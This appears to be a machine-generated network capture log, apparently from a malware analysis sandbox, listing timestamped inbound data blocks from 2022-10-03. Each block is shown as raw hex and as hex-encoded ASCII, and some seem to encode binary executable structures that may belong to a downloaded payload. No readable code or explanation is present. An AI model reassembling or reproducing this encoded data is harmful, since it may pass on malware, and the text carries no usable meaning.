                                                                                                                            2022-10-03 14:03:32 UTC3175INData Raw: 32 45 43 46 30 44 43 33 37 43 44 35 46 39 32 31 42 38 32 31 38 45 42 33 45 43 37 38 43 46 38 46 34 36 43 39 41 42 34 35 31 30 43 41 37 35 41 42 41 32 41 46 35 37 32 43 30 38 38 39 43 37 33 45 42 45 42 30 39 46 45 38 30 33 33 35 35 38 39 34 42 33 37 45 43 30 35 35 42 35 36 34 33 41 41 33 42 45 33 36 43 37 37 38 42 37 32 45 44 30 41 43 37 45 34 31 33 36 44 33 36 32 37 43 32 44 32 31 34 45 44 44 41 32 46 33 30 42 41 46 33 43 38 42 46 35 44 31 46 37 38 32 37 46 35 37 44 32 42 46 35 32 37 41 42 46 37 41 30 31 41 31 36 44 33 35 30 35 39 30 44 44 43 30 43 44 37 39 36 33 44 42 41 37 32 32 45 32 34 43 32 37 30 33 41 42 37 42 31 44 44 42 32 44 43 41 44 46 33 32 33 43 34 34 31 30 44 43 33 36 32 34 45 46 43 46 30 35 37 34 35 41 46 39 41 45 35 37 42 39 37 41 36 30 33
                                                                                                                            Data Ascii: 2ECF0DC37CD5F921B8218EB3EC78CF8F46C9AB4510CA75ABA2AF572C0889C73EBEB09FE803355894B37EC055B5643AA3BE36C778B72ED0AC7E4136D3627C2D214EDDA2F30BAF3C8BF5D1F7827F57D2BF527ABF7A01A16D350590DDC0CD7963DBA722E24C2703AB7B1DDB2DCADF323C4410DC3624EFCF05745AF9AE57B97A603
                                                                                                                            2022-10-03 14:03:32 UTC3191INData Raw: 38 46 44 41 32 32 38 30 41 31 42 35 45 37 38 32 31 45 44 43 41 44 31 46 41 45 44 34 39 39 35 33 45 43 33 30 44 33 32 32 34 46 33 42 36 38 33 44 41 42 34 43 34 33 31 36 34 38 35 44 45 43 38 37 34 32 39 30 38 45 36 43 37 38 44 39 35 35 43 31 39 42 43 32 38 34 45 43 37 44 35 39 37 46 46 31 44 38 44 39 33 36 38 35 35 35 44 39 43 46 32 32 30 31 41 43 44 38 38 43 42 33 45 44 30 36 45 44 42 31 34 43 35 45 31 37 36 46 42 33 46 36 45 45 39 44 45 30 38 44 30 31 36 31 30 30 39 42 41 38 33 41 36 38 35 33 37 32 46 37 36 42 43 37 46 41 30 37 42 34 34 39 34 39 32 30 46 34 41 31 45 32 33 41 37 38 45 38 43 31 37 45 36 45 43 35 45 45 45 46 34 35 37 35 45 46 38 38 45 36 39 41 35 36 41 33 34 45 35 46 34 41 34 38 32 31 43 33 41 41 35 42 36 36 39 45 35 36 34 44 44 42 35 42 35
                                                                                                                            Data Ascii: 8FDA2280A1B5E7821EDCAD1FAED49953EC30D3224F3B683DAB4C4316485DEC8742908E6C78D955C19BC284EC7D597FF1D8D9368555D9CF2201ACD88CB3ED06EDB14C5E176FB3F6EE9DE08D0161009BA83A685372F76BC7FA07B4494920F4A1E23A78E8C17E6EC5EEEF4575EF88E69A56A34E5F4A4821C3AA5B669E564DDB5B5
                                                                                                                            2022-10-03 14:03:32 UTC3207INData Raw: 36 44 33 39 33 41 30 45 35 42 41 45 46 43 43 39 44 42 32 36 39 33 43 30 37 35 30 37 37 37 44 36 34 46 31 32 34 35 39 35 36 37 34 31 36 33 34 30 37 34 31 30 39 39 31 42 35 36 36 35 41 46 35 31 33 39 32 43 38 36 43 44 36 42 35 35 46 41 35 43 32 37 32 30 30 37 41 41 35 30 44 44 30 30 36 35 41 33 37 44 36 43 46 43 32 38 43 33 44 35 46 32 38 44 32 43 41 38 42 44 45 46 34 46 33 46 32 43 45 36 32 30 41 44 41 46 46 35 39 30 39 46 42 46 38 41 31 45 35 41 37 33 31 31 41 42 35 32 39 39 46 37 31 37 42 36 38 42 41 45 43 43 43 30 30 39 43 38 45 31 32 39 44 42 32 36 35 42 37 42 36 37 33 42 37 41 39 45 38 34 33 36 37 44 45 45 42 41 38 34 36 38 43 44 42 32 44 37 44 43 32 35 41 39 42 42 42 34 31 36 32 32 41 31 31 32 41 45 33 36 41 32 38 35 38 30 46 46 44 39 35 36 30 42 35
                                                                                                                            Data Ascii: 6D393A0E5BAEFCC9DB2693C0750777D64F124595674163407410991B5665AF51392C86CD6B55FA5C272007AA50DD0065A37D6CFC28C3D5F28D2CA8BDEF4F3F2CE620ADAFF5909FBF8A1E5A7311AB5299F717B68BAECCC009C8E129DB265B7B673B7A9E84367DEEBA8468CDB2D7DC25A9BBB41622A112AE36A28580FFD9560B5
                                                                                                                            2022-10-03 14:03:32 UTC3223INData Raw: 44 43 39 38 31 33 37 33 45 34 34 45 43 42 44 41 46 41 32 38 37 43 34 44 43 37 35 32 35 36 30 34 41 38 43 39 38 35 31 42 30 31 42 33 38 41 31 33 30 41 42 35 38 46 46 42 31 39 35 44 46 30 35 30 35 30 30 36 45 36 32 37 33 39 43 30 42 46 44 30 43 31 31 30 31 44 35 37 41 34 31 42 30 32 31 45 43 43 46 33 34 34 37 37 33 41 39 46 44 35 42 36 36 36 45 41 46 32 34 41 33 41 42 42 45 30 34 45 45 45 42 42 34 43 32 38 36 31 31 46 41 36 45 44 43 43 34 33 32 35 32 45 44 42 36 44 44 39 34 32 43 37 34 35 45 45 38 42 36 41 38 37 36 32 39 31 31 42 46 32 34 41 35 38 45 43 41 32 31 38 36 44 41 38 36 34 41 33 37 34 35 46 35 37 35 42 30 32 37 41 36 43 46 46 33 42 46 31 42 44 31 46 34 33 42 44 43 42 33 33 32 44 46 45 41 34 32 34 41 43 35 46 34 31 35 42 45 46 34 36 39 46 46 33 46
                                                                                                                            Data Ascii: DC981373E44ECBDAFA287C4DC7525604A8C9851B01B38A130AB58FFB195DF0505006E62739C0BFD0C1101D57A41B021ECCF344773A9FD5B666EAF24A3ABBE04EEEBB4C28611FA6EDCC43252EDB6DD942C745EE8B6A8762911BF24A58ECA2186DA864A3745F575B027A6CFF3BF1BD1F43BDCB332DFEA424AC5F415BEF469FF3F
                                                                                                                            2022-10-03 14:03:32 UTC3239INData Raw: 41 42 44 32 38 34 39 34 42 31 44 38 37 38 46 44 33 43 36 34 43 33 43 36 41 39 43 39 42 30 39 30 30 33 46 31 35 35 44 41 36 45 45 32 32 33 37 42 37 32 45 37 32 38 46 42 42 45 34 31 43 33 41 35 37 35 30 39 38 42 32 30 42 39 39 32 36 34 46 44 43 37 30 33 35 30 44 42 36 38 32 34 35 41 37 45 31 43 38 43 31 38 35 46 44 42 44 42 36 44 46 34 35 30 34 38 36 43 39 46 30 46 35 43 33 46 37 34 41 43 45 46 42 35 39 33 31 44 42 36 38 44 36 42 36 42 33 33 36 32 38 45 43 36 38 38 38 30 42 32 38 33 33 39 42 32 43 37 46 36 39 45 46 44 33 43 46 32 33 30 39 33 43 34 33 35 35 41 44 39 45 37 46 38 44 44 43 45 31 43 42 38 42 36 45 42 37 30 46 31 37 44 37 37 44 39 46 46 36 46 46 32 34 30 42 30 43 44 43 45 39 41 30 38 45 37 38 41 30 42 46 42 43 30 37 35 39 37 33 34 33 38 38 43 41
                                                                                                                            Data Ascii: ABD28494B1D878FD3C64C3C6A9C9B09003F155DA6EE2237B72E728FBBE41C3A575098B20B99264FDC70350DB68245A7E1C8C185FDBDB6DF450486C9F0F5C3F74ACEFB5931DB68D6B6B33628EC68880B28339B2C7F69EFD3CF23093C4355AD9E7F8DDCE1CB8B6EB70F17D77D9FF6FF240B0CDCE9A08E78A0BFBC0759734388CA
                                                                                                                            2022-10-03 14:03:32 UTC3255INData Raw: 31 44 31 34 44 39 37 36 45 34 33 37 34 39 32 45 32 35 37 32 44 45 35 37 31 30 42 43 38 42 38 45 30 38 32 39 43 32 45 30 46 41 44 33 33 30 31 36 33 43 42 33 37 44 39 37 42 35 34 39 36 44 35 36 38 41 42 37 42 43 37 42 42 41 41 37 36 36 31 30 37 38 36 42 31 34 35 38 39 35 38 35 33 41 36 36 35 44 41 42 42 43 31 30 38 42 45 44 30 33 42 44 34 32 37 44 39 38 35 44 46 30 43 31 43 37 34 30 31 38 44 42 37 45 46 30 45 36 39 32 33 45 46 46 30 44 31 45 36 37 34 35 30 37 34 39 43 34 34 41 46 35 39 31 30 34 30 43 34 43 39 31 44 32 41 41 30 37 39 36 45 30 44 35 35 44 45 41 43 42 36 33 30 43 34 30 45 41 42 33 44 32 37 41 45 45 45 46 31 32 33 44 33 35 44 38 44 45 36 45 39 43 34 38 32 43 45 43 31 30 43 35 38 41 36 45 36 39 34 30 31 46 38 46 44 42 39 33 39 31 45 34 41 45 38
                                                                                                                            Data Ascii: 1D14D976E437492E2572DE5710BC8B8E0829C2E0FAD330163CB37D97B5496D568AB7BC7BBAA76610786B145895853A665DABBC108BED03BD427D985DF0C1C74018DB7EF0E6923EFF0D1E67450749C44AF591040C4C91D2AA0796E0D55DEACB630C40EAB3D27AEEEF123D35D8DE6E9C482CEC10C58A6E69401F8FDB9391E4AE8
                                                                                                                            2022-10-03 14:03:32 UTC3271INData Raw: 37 36 37 38 46 38 39 43 46 43 33 45 30 31 36 34 37 31 37 31 38 31 35 34 46 44 30 35 30 34 34 37 41 31 33 44 36 37 43 42 45 41 32 37 37 45 46 44 34 43 32 33 36 30 45 45 37 33 42 42 38 36 37 37 41 30 42 31 46 35 45 33 36 41 38 30 31 37 46 33 45 31 41 44 35 36 38 46 45 39 35 44 44 46 41 42 35 44 30 30 38 30 37 42 30 37 39 44 35 37 38 32 45 34 33 45 36 42 42 32 37 42 32 39 34 39 38 46 33 33 36 35 44 41 39 42 31 43 32 46 41 42 39 30 34 44 46 37 30 36 33 36 39 37 46 46 30 34 32 31 45 45 30 39 44 42 44 46 33 45 43 39 42 33 35 32 32 39 46 42 32 34 31 34 31 30 43 42 31 34 33 37 30 32 41 42 43 43 30 46 41 44 45 39 33 33 44 39 30 41 33 32 30 38 34 39 32 33 37 36 43 31 36 45 33 42 36 32 32 39 37 46 44 34 44 39 32 37 43 46 37 34 30 36 45 36 41 32 41 33 38 42 36 31 45
                                                                                                                            Data Ascii: 7678F89CFC3E016471718154FD050447A13D67CBEA277EFD4C2360EE73BB8677A0B1F5E36A8017F3E1AD568FE95DDFAB5D00807B079D5782E43E6BB27B29498F3365DA9B1C2FAB904DF7063697FF0421EE09DBDF3EC9B35229FB241410CB143702ABCC0FADE933D90A3208492376C16E3B62297FD4D927CF7406E6A2A38B61E
                                                                                                                            2022-10-03 14:03:32 UTC3287INData Raw: 41 33 31 30 41 36 30 35 39 45 42 35 44 36 41 33 42 36 36 34 30 42 45 33 33 37 43 31 43 34 42 39 33 35 33 43 36 43 34 38 45 43 41 30 44 32 32 33 37 42 33 33 32 33 44 36 41 30 37 36 46 30 36 41 41 33 44 32 36 41 41 31 31 32 45 31 34 39 39 44 44 38 31 46 34 34 43 46 35 37 30 33 37 30 42 39 39 43 42 34 38 39 33 38 31 44 38 31 41 46 41 34 38 34 44 37 46 36 41 35 33 33 42 30 30 31 33 37 46 45 45 41 31 32 45 31 39 37 42 36 30 30 41 44 44 32 46 44 39 41 32 37 34 34 35 30 35 36 37 34 37 45 44 34 44 37 32 46 36 44 45 39 45 46 45 37 37 31 35 33 41 33 41 30 46 45 32 30 44 42 36 44 46 39 34 32 37 31 34 46 35 45 33 42 34 36 37 38 38 37 35 43 37 38 46 43 41 37 46 44 45 42 46 32 31 37 44 36 35 43 34 38 37 42 35 33 30 44 37 44 42 33 30 33 37 36 45 39 38 45 42 36 33 41 44
                                                                                                                            Data Ascii: A310A6059EB5D6A3B6640BE337C1C4B9353C6C48ECA0D2237B3323D6A076F06AA3D26AA112E1499DD81F44CF570370B99CB489381D81AFA484D7F6A533B00137FEEA12E197B600ADD2FD9A27445056747ED4D72F6DE9EFE77153A3A0FE20DB6DF942714F5E3B4678875C78FCA7FDEBF217D65C487B530D7DB30376E98EB63AD
                                                                                                                            2022-10-03 14:03:32 UTC3303INData Raw: 31 43 38 30 41 41 41 45 36 39 35 39 30 35 38 45 36 42 42 31 31 36 37 43 36 46 46 39 45 43 45 39 43 45 39 42 42 38 41 39 43 46 33 39 36 42 44 33 36 30 42 31 43 35 32 30 42 46 32 44 41 37 43 38 44 31 41 44 37 43 41 32 44 41 31 38 41 39 37 41 46 35 39 42 43 43 31 44 30 42 32 39 30 30 44 38 45 42 31 30 39 45 39 35 41 36 44 41 35 35 39 32 44 41 44 36 38 31 37 34 44 34 46 46 46 45 45 37 41 43 35 42 42 39 36 33 35 32 35 36 30 34 46 36 37 36 31 39 39 46 43 42 42 39 30 43 46 46 45 35 46 31 34 31 36 35 35 31 42 35 32 46 33 30 35 35 35 32 31 37 43 33 35 38 39 45 32 46 43 31 34 34 33 38 38 39 46 43 41 35 31 42 35 38 41 34 33 35 39 37 42 46 34 43 46 36 38 34 34 46 35 38 41 33 35 46 31 43 38 34 46 32 43 43 41 32 39 37 33 31 37 44 33 34 41 34 44 35 36 42 34 42 44 35 35
                                                                                                                            Data Ascii: 1C80AAAE6959058E6BB1167C6FF9ECE9CE9BB8A9CF396BD360B1C520BF2DA7C8D1AD7CA2DA18A97AF59BCC1D0B2900D8EB109E95A6DA5592DAD68174D4FFFEE7AC5BB963525604F676199FCBB90CFFE5F1416551B52F30555217C3589E2FC1443889FCA51B58A43597BF4CF6844F58A35F1C84F2CCA297317D34A4D56B4BD55
                                                                                                                            2022-10-03 14:03:32 UTC3319INData Raw: 38 33 45 37 34 41 43 33 43 42 34 35 45 31 30 46 39 39 42 34 42 42 39 39 31 39 36 42 33 37 33 32 43 43 45 32 38 34 42 37 44 37 39 42 34 39 30 39 32 30 38 35 44 46 43 41 44 35 41 39 43 39 34 45 39 32 41 30 35 32 38 36 36 38 43 31 32 44 37 43 31 30 38 31 45 46 41 34 42 39 34 42 32 38 41 43 43 41 46 42 45 41 41 34 33 46 46 44 39 39 46 43 44 34 34 31 38 36 44 35 39 37 32 44 36 32 35 42 41 35 46 38 37 45 44 43 30 46 32 30 36 30 33 30 35 46 34 30 34 37 31 43 32 44 43 35 32 36 39 32 45 44 34 32 41 37 30 33 33 37 45 39 37 32 46 46 44 46 46 36 42 38 33 43 33 30 33 31 46 36 36 35 41 44 44 41 46 31 38 37 45 45 36 37 38 36 35 43 42 43 39 38 31 30 38 41 38 37 43 31 42 43 38 38 35 42 41 41 36 31 35 46 32 37 36 30 37 34 31 37 46 46 46 34 41 39 42 33 31 44 41 41 38 32 45
                                                                                                                            Data Ascii: 83E74AC3CB45E10F99B4BB99196B3732CCE284B7D79B49092085DFCAD5A9C94E92A0528668C12D7C1081EFA4B94B28ACCAFBEAA43FFD99FCD44186D5972D625BA5F87EDC0F2060305F40471C2DC52692ED42A70337E972FFDFF6B83C3031F665ADDAF187EE67865CBC98108A87C1BC885BAA615F27607417FFF4A9B31DAA82E
                                                                                                                            2022-10-03 14:03:32 UTC3335INData Raw: 34 42 31 38 33 41 32 41 42 42 33 46 31 44 33 30 37 45 44 46 42 41 46 46 34 33 43 38 36 36 33 36 41 41 46 44 39 43 45 34 46 31 33 38 44 35 31 31 42 39 32 43 42 31 39 34 38 42 43 33 41 45 36 35 30 30 37 37 36 32 38 36 37 30 46 41 35 31 30 42 30 31 36 31 33 41 36 46 37 35 32 45 31 41 38 43 38 43 33 41 43 42 34 30 36 36 30 43 32 35 35 42 34 41 33 45 45 34 31 31 34 34 43 44 43 43 36 42 31 31 41 34 37 39 35 46 43 32 31 43 32 39 46 31 33 39 46 32 44 45 46 43 45 32 39 45 34 46 30 45 42 32 30 34 39 37 41 46 37 37 41 30 36 43 41 43 39 35 42 41 39 35 38 31 30 32 41 35 36 30 30 35 30 44 46 31 44 45 35 42 46 32 43 35 44 44 42 39 31 32 43 42 45 33 39 38 32 32 43 37 46 39 37 36 30 37 33 38 44 35 42 34 31 30 43 45 43 46 36 34 44 42 30 31 44 42 30 44 35 42 45 34 30 35 45
                                                                                                                            Data Ascii: 4B183A2ABB3F1D307EDFBAFF43C86636AAFD9CE4F138D511B92CB1948BC3AE650077628670FA510B01613A6F752E1A8C8C3ACB40660C255B4A3EE41144CDCC6B11A4795FC21C29F139F2DEFCE29E4F0EB20497AF77A06CAC95BA958102A560050DF1DE5BF2C5DDB912CBE39822C7F9760738D5B410CECF64DB01DB0D5BE405E
                                                                                                                            2022-10-03 14:03:32 UTC3351INData Raw: 42 43 34 30 41 34 41 42 34 30 38 31 38 33 39 44 36 34 41 36 37 37 43 41 44 32 35 37 34 31 46 34 42 33 46 35 33 34 41 43 41 46 33 36 38 33 41 46 43 35 38 46 46 42 45 37 30 32 35 36 39 43 30 33 30 33 41 39 30 30 34 43 36 37 44 37 37 31 37 31 34 31 43 38 34 33 33 44 45 44 30 34 37 38 37 37 45 45 46 45 30 41 35 44 37 33 37 34 39 41 45 36 30 44 46 33 33 38 32 39 39 42 36 39 34 44 36 32 34 42 36 39 43 35 41 38 33 43 37 41 31 35 34 42 37 42 39 34 30 38 35 33 33 37 43 38 44 37 39 45 34 44 37 30 41 46 35 41 32 33 39 30 30 38 43 46 42 36 35 41 36 42 38 44 45 37 32 39 36 39 46 35 45 39 37 35 43 36 37 42 34 41 35 42 35 43 31 42 46 46 45 37 33 45 42 30 30 31 41 32 30 36 34 44 43 46 31 36 46 39 42 46 33 34 30 33 45 37 45 37 41 46 39 46 43 30 38 35 34 30 35 37 42 42 42
                                                                                                                            Data Ascii: BC40A4AB4081839D64A677CAD25741F4B3F534ACAF3683AFC58FFBE702569C0303A9004C67D7717141C8433DED047877EEFE0A5D73749AE60DF338299B694D624B69C5A83C7A154B7B94085337C8D79E4D70AF5A239008CFB65A6B8DE72969F5E975C67B4A5B5C1BFFE73EB001A2064DCF16F9BF3403E7E7AF9FC0854057BBB
                                                                                                                            2022-10-03 14:03:32 UTC3367INData Raw: 38 38 42 33 36 45 39 33 32 33 41 35 37 39 30 30 32 30 39 44 41 32 45 39 36 37 46 39 42 30 38 39 42 35 44 37 35 42 46 33 44 34 33 46 44 39 39 32 37 41 34 46 42 44 46 44 46 32 45 37 34 46 35 44 36 32 30 41 37 39 43 31 38 43 33 33 32 33 30 34 32 33 38 43 43 45 34 35 46 33 30 44 36 46 37 46 30 31 32 38 32 32 43 44 43 30 38 32 45 36 35 42 41 44 45 38 35 31 38 38 45 39 42 32 46 30 37 46 34 37 34 44 39 37 32 45 42 46 46 34 38 39 43 37 36 34 39 34 34 39 39 45 41 32 32 38 36 41 38 41 36 37 32 41 34 46 43 38 42 32 45 41 33 38 34 42 32 37 36 38 38 42 45 37 33 30 45 44 45 39 41 30 41 39 33 45 41 45 43 36 38 32 35 35 36 31 43 32 44 31 43 39 43 31 43 37 39 30 33 37 33 30 44 31 39 33 39 31 42 41 33 39 41 45 33 33 32 43 45 39 31 45 42 35 38 43 43 39 43 39 35 37 33 39 43
                                                                                                                            Data Ascii: 88B36E9323A57900209DA2E967F9B089B5D75BF3D43FD9927A4FBDFDF2E74F5D620A79C18C332304238CCE45F30D6F7F012822CDC082E65BADE85188E9B2F07F474D972EBFF489C76494499EA2286A8A672A4FC8B2EA384B27688BE730EDE9A0A93EAEC6825561C2D1C9C1C7903730D19391BA39AE332CE91EB58CC9C95739C
                                                                                                                            2022-10-03 14:03:32 UTC3383INData Raw: 35 34 45 38 33 39 43 37 32 35 35 44 30 46 37 34 46 31 32 33 38 45 46 44 42 36 46 42 39 34 36 34 43 30 30 46 35 34 41 43 34 35 45 38 46 32 42 32 30 33 33 30 41 36 41 34 34 41 41 37 39 46 38 34 39 38 38 42 41 46 45 42 39 43 30 45 37 37 38 30 38 39 43 36 30 31 45 38 39 36 42 38 43 30 46 35 42 44 45 39 39 33 43 43 33 30 46 38 45 31 45 46 38 44 46 42 44 39 44 43 31 46 38 38 36 37 39 37 34 34 42 30 33 45 36 39 43 44 42 44 35 42 34 31 38 38 46 34 37 46 36 31 30 32 45 31 43 45 33 31 31 43 30 45 46 34 33 37 30 38 32 34 31 32 35 43 34 43 37 31 41 39 44 36 39 30 37 42 33 43 30 36 35 46 33 39 42 35 44 37 41 31 45 33 45 35 39 38 37 41 44 42 44 44 39 45 30 44 39 42 32 44 42 41 33 30 43 37 30 45 35 38 38 44 35 32 31 36 43 42 35 45 46 30 37 31 45 46 32 32 38 41 34 42 30
                                                                                                                            Data Ascii: 54E839C7255D0F74F1238EFDB6FB9464C00F54AC45E8F2B20330A6A44AA79F84988BAFEB9C0E778089C601E896B8C0F5BDE993CC30F8E1EF8DFBD9DC1F88679744B03E69CDBD5B4188F47F6102E1CE311C0EF4370824125C4C71A9D6907B3C065F39B5D7A1E3E5987ADBDD9E0D9B2DBA30C70E588D5216CB5EF071EF228A4B0
                                                                                                                            2022-10-03 14:03:32 UTC3399INData Raw: 30 42 42 36 35 38 43 43 42 46 38 36 39 34 43 32 36 45 34 42 46 33 34 33 38 34 31 37 42 46 39 30 44 31 33 30 44 33 44 46 36 39 34 45 38 32 32 39 37 43 35 37 32 41 46 38 39 31 36 36 43 31 31 46 42 30 41 41 35 32 34 39 45 36 34 44 34 31 42 37 45 30 42 46 41 44 42 30 41 31 42 37 33 39 44 32 33 39 43 34 30 41 31 30 30 31 35 39 46 41 37 36 36 35 44 35 30 38 38 45 32 46 38 35 45 44 44 37 44 43 30 33 37 32 34 37 31 34 38 35 35 32 42 30 41 38 42 38 37 37 46 33 33 33 34 42 35 39 39 39 36 32 30 41 31 32 33 46 36 38 45 38 41 39 46 37 33 45 42 34 42 42 45 35 44 44 43 39 42 33 32 31 39 31 46 39 33 42 36 45 36 35 30 31 31 32 43 37 36 32 32 34 33 46 31 42 36 42 46 33 36 37 32 35 31 43 43 46 41 43 39 42 36 33 36 41 33 36 39 33 45 42 35 30 41 37 37 34 30 37 36 34 39 30 44
                                                                                                                            Data Ascii: 0BB658CCBF8694C26E4BF3438417BF90D130D3DF694E82297C572AF89166C11FB0AA5249E64D41B7E0BFADB0A1B739D239C40A100159FA7665D5088E2F85EDD7DC037247148552B0A8B877F3334B5999620A123F68E8A9F73EB4BBE5DDC9B32191F93B6E650112C762243F1B6BF367251CCFAC9B636A3693EB50A774076490D
                                                                                                                            2022-10-03 14:03:32 UTC3415INData Raw: 41 35 33 30 34 43 36 37 38 37 41 38 44 46 32 44 34 43 34 30 38 36 33 42 45 44 30 38 36 30 42 43 46 41 43 38 46 44 33 32 33 45 45 46 39 42 31 36 32 31 46 30 33 45 30 38 35 33 43 33 39 31 43 42 32 44 35 30 38 33 41 37 39 39 32 42 42 36 31 31 38 37 43 30 44 35 42 32 33 45 41 38 31 33 31 43 39 41 42 45 30 45 37 33 41 46 32 46 42 44 35 32 46 31 45 35 31 33 30 33 39 36 36 46 34 35 43 33 43 38 46 43 36 45 37 34 42 37 34 41 35 37 45 34 41 44 42 39 36 30 37 31 41 30 45 36 36 30 31 43 41 39 46 39 38 36 32 36 42 37 37 39 36 35 38 37 38 45 30 46 32 36 45 34 32 30 33 39 44 39 31 35 37 34 33 31 38 35 38 35 45 30 45 45 45 39 35 45 43 38 41 31 42 37 42 46 43 44 42 34 31 45 30 45 31 30 30 42 37 46 32 42 30 33 33 31 42 32 45 41 34 38 43 30 44 36 44 31 35 33 41 42 44 43 36
                                                                                                                            Data Ascii: A5304C6787A8DF2D4C40863BED0860BCFAC8FD323EEF9B1621F03E0853C391CB2D5083A7992BB61187C0D5B23EA8131C9ABE0E73AF2FBD52F1E51303966F45C3C8FC6E74B74A57E4ADB96071A0E6601CA9F98626B77965878E0F26E42039D91574318585E0EEE95EC8A1B7BFCDB41E0E100B7F2B0331B2EA48C0D6D153ABDC6
                                                                                                                            2022-10-03 14:03:32 UTC3431INData Raw: 30 30 30 33 30 30 42 30 30 44 39 33 30 30 30 33 30 30 36 45 30 44 39 33 30 30 30 33 30 30 38 46 30 44 43 44 30 30 30 33 30 30 39 36 30 44 39 33 30 30 30 33 30 30 41 34 30 44 39 33 30 30 30 33 30 30 39 44 30 44 39 41 30 30 30 33 30 30 41 42 30 44 39 41 30 30 30 33 30 30 31 31 30 45 39 41 30 30 30 33 30 30 37 42 30 44 39 41 30 30 30 33 30 30 46 38 30 44 39 41 30 30 30 33 30 30 46 44 30 44 39 41 30 30 30 33 30 30 30 37 30 45 39 33 30 30 30 33 30 30 30 32 30 45 39 33 30 30 30 33 30 30 30 43 30 45 39 33 30 30 30 33 30 30 30 41 30 46 39 33 30 30 30 33 30 30 38 30 30 44 39 41 30 30 30 33 30 30 34 44 30 45 39 41 30 30 30 33 30 30 44 41 30 45 43 44 30 30 30 33 30 30 46 36 30 45 43 44 30 30 30 33 30 30 45 43 30 45 43 44 30 30 30 33 30 30 30 30 30 46 43 44 30 30 30
                                                                                                                            Data Ascii: 000300B00D930003006E0D930003008F0DCD000300960D93000300A40D930003009D0D9A000300AB0D9A000300110E9A0003007B0D9A000300F80D9A000300FD0D9A000300070E93000300020E930003000C0E930003000A0F93000300800D9A0003004D0E9A000300DA0ECD000300F60ECD000300EC0ECD000300000FCD000
                                                                                                                            2022-10-03 14:03:32 UTC3447INData Raw: 30 30 39 34 30 44 37 34 30 31 30 31 30 30 41 32 30 44 37 34 30 31 30 31 30 30 36 43 30 44 44 30 30 30 30 31 30 30 36 43 30 44 41 39 30 31 33 33 30 31 36 43 30 44 32 44 32 31 33 33 30 31 38 44 30 44 32 44 32 31 33 36 30 30 36 43 30 44 41 39 30 31 33 36 30 30 38 44 30 44 41 39 30 31 33 36 30 30 39 34 30 44 41 39 30 31 33 36 30 30 41 32 30 44 41 39 30 31 33 36 30 30 39 42 30 44 41 39 30 31 33 36 30 30 41 39 30 44 33 32 32 31 33 36 30 30 36 43 30 44 36 46 32 31 33 33 30 31 36 43 30 44 37 39 32 31 33 33 30 31 38 44 30 44 37 45 32 31 33 33 30 31 39 34 30 44 38 33 32 31 33 33 30 31 41 32 30 44 38 38 32 31 33 33 30 31 39 42 30 44 38 44 32 31 33 33 30 31 41 39 30 44 39 32 32 31 35 30 32 30 30 30 30 30 30 30 30 30 39 31 31 38 41 31 31 31 31 33 30 30 30 31 30 30 35
                                                                                                                            Data Ascii: 00940D74010100A20D740101006C0DD00001006C0DA90133016C0D2D2133018D0D2D2136006C0DA90136008D0DA9013600940DA9013600A20DA90136009B0DA9013600A90D322136006C0D6F2133016C0D792133018D0D7E213301940D83213301A20D882133019B0D8D213301A90D92215020000000009118A111130001005
                                                                                                                            2022-10-03 14:03:32 UTC3463INData Raw: 46 33 30 30 30 30 30 30 30 30 43 36 30 30 30 31 31 32 38 41 30 30 32 38 30 34 30 38 46 34 30 30 30 30 30 30 30 30 43 36 30 30 38 45 31 33 39 36 30 38 32 39 30 34 34 30 46 34 30 30 30 30 30 30 30 30 39 33 30 30 36 43 30 44 39 32 30 32 32 41 30 34 36 34 46 34 30 30 30 30 30 30 30 30 38 36 31 38 43 39 31 31 39 44 30 38 32 41 30 34 38 30 46 34 30 30 30 30 30 30 30 30 38 36 30 30 36 43 30 44 41 35 30 38 32 43 30 34 38 38 46 34 30 30 30 30 30 30 30 30 43 36 30 38 39 41 31 33 37 37 30 31 32 43 30 34 39 38 46 34 30 30 30 30 30 30 30 30 43 36 30 38 41 36 31 33 37 37 30 31 32 43 30 34 41 38 46 34 30 30 30 30 30 30 30 30 43 36 30 38 42 32 31 33 37 37 30 31 32 43 30 34 42 38 46 34 30 30 30 30 30 30 30 30 43 36 30 30 42 32 31 33 31 37 30 30 32 43 30 34 43 38 46 34 30
                                                                                                                            Data Ascii: F300000000C60001128A00280408F400000000C6008E139608290440F40000000093006C0D92022A0464F4000000008618C9119D082A0480F40000000086006C0DA5082C0488F400000000C6089A1377012C0498F400000000C608A61377012C04A8F400000000C608B21377012C04B8F400000000C600B21317002C04C8F40
                                                                                                                            2022-10-03 14:03:32 UTC3479INData Raw: 30 30 30 30 30 30 38 36 30 30 36 43 30 44 33 32 30 30 44 32 30 37 39 30 35 41 30 31 30 30 30 30 30 30 38 36 30 30 36 43 30 44 34 44 30 30 44 32 30 37 39 43 35 41 30 31 30 30 30 30 30 30 38 36 30 30 38 44 30 44 33 32 30 30 44 33 30 37 41 34 35 41 30 31 30 30 30 30 30 30 38 36 30 30 38 44 30 44 34 44 30 30 44 33 30 37 42 30 35 41 30 31 30 30 30 30 30 30 38 36 30 30 39 34 30 44 33 32 30 30 44 34 30 37 42 38 35 41 30 31 30 30 30 30 30 30 38 36 30 30 39 34 30 44 34 44 30 30 44 34 30 37 43 34 35 41 30 31 30 30 30 30 30 30 38 36 30 30 41 32 30 44 33 32 30 30 44 35 30 37 43 43 35 41 30 31 30 30 30 30 30 30 38 36 30 30 41 32 30 44 34 44 30 30 44 35 30 37 44 38 35 41 30 31 30 30 30 30 30 30 38 36 30 30 39 42 30 44 33 32 30 30 44 36 30 37 45 30 35 41 30 31 30 30 30
                                                                                                                            Data Ascii: 00000086006C0D3200D207905A0100000086006C0D4D00D2079C5A0100000086008D0D3200D307A45A0100000086008D0D4D00D307B05A010000008600940D3200D407B85A010000008600940D4D00D407C45A010000008600A20D3200D507CC5A010000008600A20D4D00D507D85A0100000086009B0D3200D607E05A01000
